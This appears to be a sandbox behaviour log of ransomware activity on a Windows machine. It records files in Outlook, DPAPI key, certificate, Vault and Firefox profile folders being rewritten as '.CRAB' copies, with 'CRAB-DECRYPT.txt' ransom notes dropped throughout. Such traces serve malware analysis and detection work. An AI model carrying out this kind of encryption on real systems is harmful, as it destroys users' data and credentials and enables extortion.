Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.srs.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\CREDHIST.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\5c218343-f813-4ba1-8332-5b3fa0f5717a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\7a70842e-d6a2-46c1-966c-384a4ef9d347.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\e01a7a31-687e-4cfa-9cfe-700ac08104e6.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\Preferred.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\SYNCHIST.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Signatures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Stationery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Normal.dotm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\~$Normal.dotm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Vault\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Pending Pings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\bookmarkbackups\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\compatibility.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-12\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-12\1513694905834.da7c9676-f8c5-46e7-a28d-350079b8e30e.main.jsonlz4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp\WINNT_x86_64-msvc\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\minidumps\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\saved-telemetry-pings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\profiles.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\mTXC 3V.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\nDxx_AcLmR8Id.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\nqG5jvy_8vyLOs.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
